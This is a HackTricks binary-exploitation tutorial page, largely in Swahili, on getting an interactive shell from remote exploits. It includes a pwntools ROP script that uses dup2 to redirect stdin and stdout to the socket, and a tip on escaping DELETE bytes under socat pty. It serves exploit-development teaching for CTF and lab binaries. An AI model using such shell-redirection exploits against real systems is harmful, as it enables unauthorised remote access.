hacktricks/binary-exploitation/common-exploiting-problems.md

# Common Exploiting Problems

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## FDs katika Utekelezaji wa Mbali

Wakati wa kutuma exploit kwa seva ya mbali inayopiga **`system('/bin/sh')`** kwa mfano, hii itatekelezwa katika mchakato wa seva, na `/bin/sh` itatarajia pembejeo kutoka stdin (FD: `0`) na itachapisha matokeo katika stdout na stderr (FDs `1` na `2`). Hivyo, mshambuliaji hataweza kuingiliana na shell.

Njia moja ya kutatua hii ni kudhani kwamba wakati seva ilianza iliunda **FD nambari `3`** (kwa kusikiliza) na kwamba kisha, muunganisho wako utaenda kuwa katika **FD nambari `4`**. Kwa hivyo, inawezekana kutumia syscall **`dup2`** kuiga stdin (FD 0) na stdout (FD 1) katika FD 4 (ile ya muunganisho wa mshambuliaji) ili iwezewezekana kuwasiliana na shell mara itakapotekelezwa.

[**Mfano wa exploit kutoka hapa**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
```python
from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
```
## Socat & pty

Kumbuka kwamba socat tayari inahamisha **`stdin`** na **`stdout`** kwa socket. Hata hivyo, hali ya `pty` **inasababisha wahusika wa DELETE**. Hivyo, ikiwa utatuma `\x7f` ( `DELETE` -) it **afuta wahusika wa awali** wa exploit yako.

Ili kupita hili, **mhusika wa kutoroka `\x16` lazima aongezwe kabla ya `\x7f` yoyote inayotumwa.**

**Hapa unaweza** [**kupata mfano wa tabia hii**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}